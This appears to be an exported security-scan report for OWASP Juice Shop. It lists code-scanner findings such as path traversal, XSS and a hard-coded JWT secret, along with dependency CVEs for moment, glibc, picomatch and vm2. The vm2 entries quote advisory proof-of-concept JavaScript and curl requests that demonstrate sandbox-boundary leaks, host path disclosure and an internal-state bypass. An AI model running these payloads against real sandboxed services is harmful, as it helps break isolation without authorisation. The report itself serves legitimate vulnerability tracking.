Result message: + The application processes user-input, this is passed to res.sendFile +which can allow an attacker to arbitrarily read files on the system +through path traversal. It is recommended to perform input validation in + addition to canonicalizing the path. This allows you to validate the +path against the intended directory it should be accessing.

+ + + + + + + + + + + + +
References
+

https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html

+ + + + + + + +
+
+
+
+ Finding 10: javascript.express.security.injection.raw-html-format.raw-html-format + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 79 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
197
+ + + + + + + +
File Path
/src/routes/chatbot.ts
+
+
+
+ + + + + +
Description
+

Result message: + User data flows into the host portion of this manually-constructed +HTML. This can introduce a Cross-Site-Scripting (XSS) vulnerability if +this comes from user-provided input. Consider using a sanitization +library such as DOMPurify to sanitize the HTML within.

+ + + + + + + + + + + + +
References
+

https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html

+ + + + + + + +
+
+
+
+ Finding 170: CVE-2016-4055 Moment 2.0.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 400 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
moment2.0.0
+ + + + + + + +
File Path
juice-shop/node_modules/express-jwt/node_modules/moment/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

moment.js: regular expression denial of service
+Target: Node.js
+Type: node-pkg
+Fixed version: >=2.11.2

+

The duration function in the moment package before 2.11.2 for Node.js + allows remote attackers to cause a denial of service (CPU consumption) +via a long string, aka a "regular expression Denial of Service (ReDoS)."

+ + +
Mitigation
+
+

=2.11.2

+
+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

http://www.openwall.com/lists/oss-security/2016/04/20/11
+http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
+http://www.securityfocus.com/bid/95849
+https://access.redhat.com/security/cve/CVE-2016-4055
+https://github.com/advisories/GHSA-87vv-r9j6-g5qv
+https://github.com/moment/moment
+https://lists.apache.org/thread.html/10f0f3aefd51444d1198c65f44ffdf2d78ca3359423dbc1c168c9731%40%3Cdev.flink.apache.org%3E
+https://lists.apache.org/thread.html/10f0f3aefd51444d1198c65f44ffdf2d78ca3359423dbc1c168c9731@%3Cdev.flink.apache.org%3E
+https://lists.apache.org/thread.html/17ff53f7999e74fbe3cc0ceb4e1c3b00b180b7c5afec8e978837bc49%40%3Cuser.flink.apache.org%3E
+https://lists.apache.org/thread.html/17ff53f7999e74fbe3cc0ceb4e1c3b00b180b7c5afec8e978837bc49@%3Cuser.flink.apache.org%3E
+https://lists.apache.org/thread.html/52bafac05ad174000ea465fe275fd3cc7bd5c25535a7631c0bc9bfb2%40%3Cuser.flink.apache.org%3E
+https://lists.apache.org/thread.html/52bafac05ad174000ea465fe275fd3cc7bd5c25535a7631c0bc9bfb2@%3Cuser.flink.apache.org%3E
+https://lists.apache.org/thread.html/54df3aeb4239b64b50b356f0ca6f986e3c4ca5b84c515dce077c7854%40%3Cuser.flink.apache.org%3E
+https://lists.apache.org/thread.html/54df3aeb4239b64b50b356f0ca6f986e3c4ca5b84c515dce077c7854@%3Cuser.flink.apache.org%3E
+https://nodesecurity.io/advisories/55
+https://nvd.nist.gov/vuln/detail/CVE-2016-4055
+https://ubuntu.com/security/notices/USN-4786-1
+https://www.cve.org/CVERecord?id=CVE-2016-4055
+https://www.npmjs.com/advisories/55
+https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS
+https://www.tenable.com/security/tns-2019-02

+ + + + + + + +
+
+
+
+ Finding 9: javascript.jsonwebtoken.security.jwt-hardcode.hardcoded-jwt-secret + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 798 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
56
+ + + + + + + +
File Path
/src/lib/insecurity.ts
+
+
+
+ + + + + +
Description
+

Result message: + A hard-coded credential was detected. It is not recommended to store +credentials in source-code, as this risks secrets being leaked and used +by either an internal or external malicious adversary. It is recommended + to use environment variables to securely provide credentials or +retrieve credentials from a secure vault or HSM (Hardware Security +Module).

+ + + + + + + + + + + + +
References
+

https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html

+ + + + + + + +
+
+
+
+ Finding 8: generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 79 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
40
+ + + + + + + +
File Path
/src/frontend/src/app/search-result/search-result.component.html
+
+
+
+ + + + + +
Description
+

Result message: + Detected a unquoted template variable as an attribute. If unquoted, a +malicious actor could inject custom JavaScript handlers. To fix this, +add quotes around the template expression, like this: "{{ expr }}".

+ + + + + + + + + + + + +
References
+

https://flask.palletsprojects.com/en/1.1.x/security/#cross-site-scripting-xss

+ + + + + + + +
+
+
+
+ Finding 7: generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 79 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
15
+ + + + + + + +
File Path
/src/frontend/src/app/purchase-basket/purchase-basket.component.html
+
+
+
+ + + + + +
Description
+

Result message: + Detected a unquoted template variable as an attribute. If unquoted, a +malicious actor could inject custom JavaScript handlers. To fix this, +add quotes around the template expression, like this: "{{ expr }}".

+ + + + + + + + + + + + +
References
+

https://flask.palletsprojects.com/en/1.1.x/security/#cross-site-scripting-xss

+ + + + + + + +
+
+
+
+ Finding 6: generic.html-templates.security.unquoted-attribute-var.unquoted-attribute-var + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 79 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
17
+ + + + + + + +
File Path
/src/frontend/src/app/navbar/navbar.component.html
+
+
+
+ + + + + +
Description
+

Result message: + Detected a unquoted template variable as an attribute. If unquoted, a +malicious actor could inject custom JavaScript handlers. To fix this, +add quotes around the template expression, like this: "{{ expr }}".

+ + + + + + + + + + + + +
References
+

https://flask.palletsprojects.com/en/1.1.x/security/#cross-site-scripting-xss

+ + + + + + + +
+
+
+
+ Finding 244: Secret Detected in +/juice-shop/frontend/src/app/last-login-ip/last-login- +ip.component.spec.ts - JWT Token + + + + secret + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
61
+ + + + + + + +
File Path
/juice-shop/frontend/src/app/last-login-ip/last-login-ip.component.spec.ts
+
+
+
+ + + + + +
Description
+

JWT token
+Category: JWT
+Match: ocalStorage.setItem('token', '*******************')

+ + + + + + + + + + + + + + + + + + +
+
+
+
+ Finding 32: CVE-2026-0915 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 908 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

+ + +
Description
+

glibc: glibc: Information disclosure via zero-valued network query
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

Calling getnetbyaddr or getnetbyaddr_r with a configured +nsswitch.conf that specifies the library's DNS backend for networks and +queries for a zero-valued network in the GNU C Library version 2.0 to +version 2.42 can leak stack contents to the configured DNS resolver.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

http://www.openwall.com/lists/oss-security/2026/01/16/6
+https://access.redhat.com/errata/RHSA-2026:2786
+https://access.redhat.com/security/cve/CVE-2026-0915
+https://bugzilla.redhat.com/2429771
+https://bugzilla.redhat.com/2430201
+https://bugzilla.redhat.com/2431196
+https://bugzilla.redhat.com/show_bug.cgi?id=2429771
+https://bugzilla.redhat.com/show_bug.cgi?id=2430201
+https://bugzilla.redhat.com/show_bug.cgi?id=2431196
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15281
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0861
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0915
+https://errata.almalinux.org/9/ALSA-2026-2786.html
+https://errata.rockylinux.org/RLSA-2026:2786
+https://linux.oracle.com/cve/CVE-2026-0915.html
+https://linux.oracle.com/errata/ELSA-2026-50174.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-0915
+https://sourceware.org/bugzilla/show_bug.cgi?id=33802
+https://ubuntu.com/security/notices/USN-8005-1
+https://www.cve.org/CVERecord?id=CVE-2026-0915
+https://www.openwall.com/lists/oss-security/2026/01/16/6

+ + + + + + + +
+
+
+
+ Finding 31: CVE-2025-8058 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 415 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L

+ + +
Description
+

glibc: Double free in glibc
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 2.36-9+deb12u13

+

The regcomp function in the GNU C library version from 2.4 to 2.41 is
+subject to a double free if some previous allocation fails. It can be
+accomplished either by a malloc failure or by using an interposed malloc
+ that injects random malloc failures. The double free can allow buffer
+manipulation depending of how the regex is constructed. This issue
+affects all architectures and ABIs supported by the GNU C library.

+ + +
Mitigation
+

2.36-9+deb12u13

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

http://www.openwall.com/lists/oss-security/2025/07/23/1
+https://access.redhat.com/errata/RHSA-2025:12980
+https://access.redhat.com/security/cve/CVE-2025-8058
+https://bugzilla.redhat.com/2383146
+https://bugzilla.redhat.com/show_bug.cgi?id=2383146
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8058
+https://errata.almalinux.org/8/ALSA-2025-12980.html
+https://errata.rockylinux.org/RLSA-2025:12748
+https://linux.oracle.com/cve/CVE-2025-8058.html
+https://linux.oracle.com/errata/ELSA-2025-28054.html
+https://nvd.nist.gov/vuln/detail/CVE-2025-8058
+https://sourceware.org/bugzilla/show_bug.cgi?id=33185
+https://sourceware.org/git/?p=glibc.git;a=blob_plain;f=advisories/GLIBC-SA-2025-0005
+https://sourceware.org/git/?p=glibc.git;a=commit;h=3ff17af18c38727b88d9115e536c069e6b5d601f
+https://ubuntu.com/security/notices/USN-7760-1
+https://ubuntu.com/security/notices/USN-8005-1
+https://www.cve.org/CVERecord?id=CVE-2025-8058

+ + + + + + + +
+
+
+
+ Finding 237: CVE-2026-44000 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

+ + +
Description
+

vm2 Host Promise Resolution Preserves Object Identity Across Sandbox Boundary
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.11.0

+

Summary

+

A sandbox boundary violation in vm2 allows host object identity to cross into the sandbox through host Promise resolution.

+

When a host-side Promise that resolves to a host object is exposed to the sandbox, the value delivered to the sandbox .then() callback preserves host identity. This allows the sandbox to interact with the host object directly, including:

+
    +
  • Performing identity checks using host-side WeakMap
    • +
  • Mutating host object state from inside the sandbox
    • +
+

This behavior occurs because the Promise fulfillment wrapper uses ensureThis() instead of the stronger cross-realm conversion path (from() / proxy wrapping). If no prototype mapping is found, ensureThis() returns the original object.

+

As a result, objects resolved by host Promises can cross the sandbox boundary without proper isolation.

+
+

Details

+

In setup-sandbox.js, vm2 wraps Promise.prototype.then:

+

```js
+globalPromise.prototype.then = function then(onFulfilled, onRejected) {
+ resetPromiseSpecies(this);

+

if (typeof onFulfilled === 'function') {
+ const origOnFulfilled = onFulfilled;
+ onFulfilled = function onFulfilled(value) {
+ value = ensureThis(value);
+ return apply(origOnFulfilled, this, [value]);
+ };
+ }

+

return apply(globalPromiseThen, this, [onFulfilled, onRejected]);
+};

+

The wrapper calls ensureThis(value) before invoking the sandbox callback.

+

However, ensureThis is implemented in bridge.js as thisEnsureThis():

+

function thisEnsureThis(other) {
+ const type = typeof other;

+

switch (type) {
+ case 'object':
+ if (other === null) return null;

+
case 'function':
+  let proto = thisReflectGetPrototypeOf(other);
+
+  if (!proto) {
+    return other;
+  }
+
+  while (proto) {
+    const mapping = thisReflectApply(thisMapGet, protoMappings, [proto]);
+
+    if (mapping) {
+      const mapped = thisReflectApply(thisWeakMapGet, mappingOtherToThis, [other]);
+      if (mapped) return mapped;
+      return mapping(defaultFactory, other);
+    }
+
+    proto = thisReflectGetPrototypeOf(proto);
+  }
+
+  return other;
+
+ +

If no prototype mapping is found, ensureThis() simply returns the original object:

+

return other;

+

This means the sandbox receives the original host object instead of a proxied or sanitized representation.

+

Because of this behavior, values resolved by host Promises can cross the host–sandbox boundary with identity preserved.

+

PoC

+

The following Proof of Concept demonstrates that an object resolved +by a host Promise can be used as a valid key in a host-side WeakMap from + inside the sandbox.

+

WeakMap keys rely on reference identity, so a successful lookup proves that the sandbox received the host object identity.

+

PoC Code
+import {VM} from "./index.js";

+

const hostObj = {tag: "HOST_OBJ"};
+const hostPromise = Promise.resolve(hostObj);

+

// WeakMap created on the host
+const wm = new WeakMap([[hostObj, "HIT"]]);

+

const vm = new VM({
+ sandbox: {hostPromise, wm},
+ timeout: 1000,
+ eval: false,
+ wasm: false,
+});

+

const code = hostPromise.then(v => ({ + weakMapGet: wm.get(v), + typeofV: typeof v, + tag: v.tag + }));

+

const result = await vm.run(code);

+

console.log("VM RESULT:", result);
+console.log("HOST SAME KEY STILL:", wm.get(hostObj));
+Output
+VM RESULT: { weakMapGet: 'HIT', typeofV: 'object', tag: 'HOST_OBJ' }
+HOST SAME KEY STILL: HIT

+

This confirms that the object delivered to the sandbox callback retains host identity.

+

Additional Demonstration: Host Object Mutation

+

The sandbox can also mutate host object state through the resolved Promise value.

+

import {VM} from "./index.js";

+

const hostObj = {tag: "HOST_OBJ", nested: {x: 1}};
+const hostPromise = Promise.resolve(hostObj);

+

const vm = new VM({
+ sandbox: {hostPromise},
+ timeout: 1000,
+ eval: false,
+ wasm: false,
+});

+

const code = hostPromise.then(v => { + v.nested.x = 999; + v.tag = "MUTATED"; + return { seenTag: v.tag, seenX: v.nested.x }; + });

+

const result = await vm.run(code);

+

console.log("VM RESULT:", result);
+console.log("HOST AFTER:", hostObj);

+

Output:
+VM RESULT: { seenTag: 'MUTATED', seenX: 999 }
+HOST AFTER: { tag: 'MUTATED', nested: { x: 999 } }

+

This demonstrates write-through mutation of a host object from sandbox code.

+

Impact
+This vulnerability allows host object references to cross the vm2 sandbox boundary via Promise resolution.

+

Consequences include:

+

Host object identity disclosure

+

Write-through mutation of host objects

+

WeakMap / WeakSet identity oracle across the boundary

+

Potential capability leaks if sensitive host objects are reachable via Promises

+

Applications that expose host Promises to sandboxed code may unintentionally grant the sandbox direct access to host objects.

+

This weakens the intended isolation guarantees of vm2.

+ + +
Mitigation
+

3.11.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/releases/tag/v3.11.0
+https://github.com/patriksimek/vm2/security/advisories/GHSA-mpf8-4hx2-7cjg

+ + + + + + + +
+
+
+
+ Finding 238: CVE-2026-44002 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N

+ + +
Description
+

vm2 is Vulnerable to Host File Path Disclosure via Stack Trace Information Leak
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.11.0

+

Summary

+

vm2's CallSite wrapper class (intended as a safe wrapper for V8's native CallSite) blocks getThis() and getFunction() to prevent host object leakage, but allows getFileName() + to return unsanitized host absolute paths. Any sandboxed code can +extract the full directory structure, library paths, and framework +versions of the host server.

+

Details

+

In lib/setup-sandbox.js:436-466, the CallSite class overrides getThis() and getFunction() with undefined + to prevent host object references from leaking into the sandbox. +However, the following methods pass through unsanitized values from the +original V8 CallSite object:

+
    +
  • getFileName() — returns host absolute paths like /app/node_modules/vm2/lib/vm.js
    • +
  • getLineNumber(), getColumnNumber() — exact source locations
    • +
  • getFunctionName(), getMethodName(), getTypeName() — internal function names
    • +
+

Two exploitation paths exist:
+1. Default error.stack: new Error().stack includes host frame paths in the formatted string
+2. Custom prepareStackTrace: Attacker can set Error.prepareStackTrace to directly call getFileName() on each CallSite, extracting a clean list of all host paths

+

PoC

+

Library-level PoC (Node.js script — primary):

+
const { VM } = require("vm2");
+const vm = new VM();
+
+// Path A — Default error.stack
+const result1 = vm.run(`try { null.x; } catch(e) { e.stack }`);
+console.log(result1);
+// Output includes: /app/node_modules/vm2/lib/vm.js:289:18
+//                   /app/src/server.js:49:20
+
+// Path B — prepareStackTrace extraction
+const result2 = vm.run(`
+  Error.prepareStackTrace = function(e, sst) {
+    return sst.map(function(s) { return s.getFileName(); }).join(", ");
+  };
+  new Error().stack
+`);
+console.log(result2);
+// Output: vm.js, node:vm, /app/node_modules/vm2/lib/vm.js, /app/src/sandbox.js, ...
+
+ +

HTTP demonstration:

+
# Default error.stack
+curl -s -X POST http://localhost:3000/api/execute \
+  -H "Content-Type: application/json" \
+  -d '{"code":"try { null.x; } catch(e) { e.stack }"}'
+# Result includes host paths: /app/src/server.js, /app/node_modules/express/...
+
+# prepareStackTrace extraction
+curl -s -X POST http://localhost:3000/api/execute \
+  -H "Content-Type: application/json" \
+  -d '{"code":"Error.prepareStackTrace = function(e, sst) { return sst.map(function(s) { return s.getFileName(); }).join(\", \"); }; new Error().stack"}'
+# Result: /app/node_modules/vm2/lib/vm.js, /app/src/sandbox.js, /app/src/server.js, ...
+
+ +

Impact

+
    +
  • Information Disclosure: Host directory structure, library paths, framework versions, and internal architecture are exposed to sandboxed code.
    • +
  • Attack Chain: Leaked paths enable precise targeting for other vulnerabilities.
    • +
  • Scope: All applications using vm2. No special configuration required.
    • +
+ + +
Mitigation
+

3.11.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/releases/tag/v3.11.0
+https://github.com/patriksimek/vm2/security/advisories/GHSA-v27g-jcqj-v8rw

+ + + + + + + +
+
+
+
+ Finding 181: CVE-2026-33672 Picomatch 2.3.1 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1321 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
picomatch2.3.1
+ + + + + + + +
File Path
juice-shop/node_modules/picomatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

+ + +
Description
+

picomatch: Picomatch: Data integrity compromised via method injection with crafted POSIX bracket expressions
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.0.4, 3.0.2, 2.3.2

+

Picomatch is a glob matcher written JavaScript. Versions prior to +4.0.4, 3.0.2, and 2.3.2 are vulnerable to a method injection +vulnerability affecting the POSIX_REGEX_SOURCE object. Because the object inherits from Object.prototype, specially crafted POSIX bracket expressions (e.g., [[:constructor:]]) + can reference inherited method names. These methods are implicitly +converted to strings and injected into the generated regular expression. + This leads to incorrect glob matching behavior (integrity impact), +where patterns may match unintended filenames. The issue does not enable + remote code execution, but it can cause security-relevant logic errors +in applications that rely on glob matching for filtering, validation, or + access control. All users of affected picomatch versions +that process untrusted or user-controlled glob patterns are potentially +impacted. This issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2. Users + should upgrade to one of these versions or later, depending on their +supported release line. If upgrading is not immediately possible, avoid +passing untrusted glob patterns to picomatch. Possible mitigations +include sanitizing or rejecting untrusted glob patterns, especially +those containing POSIX character classes like [[:...:]]; avoiding the use of POSIX bracket expressions if user input is involved; and manually patching the library by modifying POSIX_REGEX_SOURCE to use a null prototype.

+ + +
Mitigation
+

4.0.4, 3.0.2, 2.3.2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33672
+https://github.com/micromatch/picomatch
+https://github.com/micromatch/picomatch/commit/4516eb521f13a46b2fe1a1d2c9ef6b20ddc0e903
+https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p
+https://nvd.nist.gov/vuln/detail/CVE-2026-33672
+https://www.cve.org/CVERecord?id=CVE-2026-33672

+ + + + + + + +
+
+
+
+ Finding 239: CVE-2026-44003 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

+ + +
Description
+

vm2's Transformer Fast-Path Bypass Exposes Internal State Variable
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.11.0

+

Summary

+

vm2's code transformer has a performance optimization that skips AST analysis when the code does not contain catch, import, or async keywords. This fast-path bypass allows sandboxed code to directly access the internal VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL variable, which exposes internal security functions (handleException, wrapWith, import).

+

Details

+

In lib/transformer.js:55-57, a regex check /\b(?:catch|import|async)\b/ + determines whether AST transformation is needed. If the code does not +contain any of these keywords, the transformer returns the code +unmodified.

+

When the fast-path is taken:
+1. INTERNAL_STATE_NAME identifier check is bypassed: The AST visitor that blocks access to VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL never runs
+2. with statement instrumentation is bypassed: with() statements are not wrapped with wrapWith(), enabling scope manipulation
+3. The internal state object exposes: handleException(e), wrapWith(x), import(what)

+

While these methods are currently defensive utilities (not direct +escape vectors), this represents a complete bypass of a security +control. Any future addition of a sensitive method to the internal state + object would be immediately exploitable.

+

PoC

+

Library-level PoC (Node.js script — primary):

+
const { VM } = require("vm2");
+const vm = new VM();
+
+// Access internal state (bypassed — no catch/import/async keywords)
+const result = vm.run(`
+  var x = VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL;
+  Object.keys(x).join(",")
+`);
+console.log(result); // "wrapWith,handleException,import"
+
+// Control test — blocked when catch keyword is present
+try {
+  vm.run(`
+    try {
+      var x = VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL;
+    } catch(e) { e.message }
+  `);
+} catch(e) {
+  console.log(e.message); // "Use of internal vm2 state variable"
+}
+
+ +

HTTP demonstration:

+
# Internal state access (bypassed)
+curl -s -X POST http://localhost:3000/api/execute \
+  -H "Content-Type: application/json" \
+  -d '{"code":"var x = VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL; Object.keys(x).join(\",\")"}'
+# Result: "wrapWith,handleException,import"
+
+# Control test — blocked when catch keyword is present
+curl -s -X POST http://localhost:3000/api/execute \
+  -H "Content-Type: application/json" \
+  -d '{"code":"try { var x = VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL; } catch(e) { e.message }"}'
+# Result: {"errors":["Use of internal vm2 state variable"]}
+
+ +

Suggested fix:

+
// transformer.js:55 — add 'with' keyword and INTERNAL_STATE_NAME check
+if (!/\b(?:catch|import|async|with)\b/.test(code) && code.indexOf(INTERNAL_STATE_NAME) === -1) {
+    return {__proto__: null, code, hasAsync: false};
+}
+
+ +

Impact

+
    +
  • Security Control Bypass: The INTERNAL_STATE_NAME access restriction is completely ineffective when the code avoids 3 specific keywords.
    • +
  • Defense-in-Depth Violation: Internal security functions are exposed, creating a latent attack surface for future code changes.
    • +
  • Scope: All applications using vm2. No special configuration required.
    • +
+ + +
Mitigation
+

3.11.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/releases/tag/v3.11.0
+https://github.com/patriksimek/vm2/security/advisories/GHSA-wp5r-2gw5-m7q7

+ + + + + + + +
+
+
+
+ Finding 183: CVE-2026-33672 Picomatch 4.0.3 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1321 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
picomatch4.0.3
+ + + + + + + +
File Path
juice-shop/node_modules/tinyglobby/node_modules/picomatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

+ + +
Description
+

picomatch: Picomatch: Data integrity compromised via method injection with crafted POSIX bracket expressions
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.0.4, 3.0.2, 2.3.2

+

